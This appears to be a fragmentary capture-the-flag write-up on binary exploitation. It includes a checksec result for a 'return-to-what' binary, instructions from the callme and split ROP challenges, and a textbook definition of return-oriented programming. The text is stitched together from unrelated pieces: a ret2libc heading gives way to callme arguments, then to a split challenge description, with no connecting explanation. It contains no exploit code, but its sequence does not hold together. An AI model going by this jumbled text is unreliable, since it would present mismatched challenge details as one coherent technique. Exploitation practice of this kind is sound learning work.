Leaking Libc addresses to do ret2libc with unknown libc First lets take a look at the binary mitigations
{} ret2what checksec return-to-what [*] '/home/h4x5p4c3/Downloads/ret2what/return-to-what' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Nx is enabled so we can’t do a bof and place our shellcode to get a shell and no canary which makes it easier and ASLR is probably enabled.
Decompilation and Disassembly The decompilation of the assembly code looks like this
“Failure is not an option”
Important note > To dispose of the need for any RE I’ll tell you the following You must call the callme_one(), callme_two() and callme_three() functions in that order, each with the arguments 0xdeadbeef, 0xcafebabe, 0xd00df00d e.g. callme_one(0xdeadbeef, 0xcafebabe, 0xd00df00d) to print the flag. For the x86_64 binary double up those values, e.g. callme_one(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)
The challenge files can be found here ~> callme
Challenge description > In this challenge the elements that allowed you to complete the ret2win challenge are still present, they’ve just been split apart. Find them and recombine them using a short ROP chain.
The binary can be found here ~> split
This challenge is slighty different from the previous challenge as the description says all elements are still present they’ve just been split apart so we’ll recombine them now :)
What is return oriented programming ? Return-oriented programming (ROP) is a computer security exploit technique that allows an attacker to execute code in the presence of security defenses such as executable space protection and code signing.
In this technique, an attacker gains control of the call stack to hijack program control flow and then executes carefully chosen machine instruction sequences that are already present in the machine’s memory, called “gadgets”. Each gadget typically ends in a return instruction and is located in a subroutine within the existing program and/or shared library code.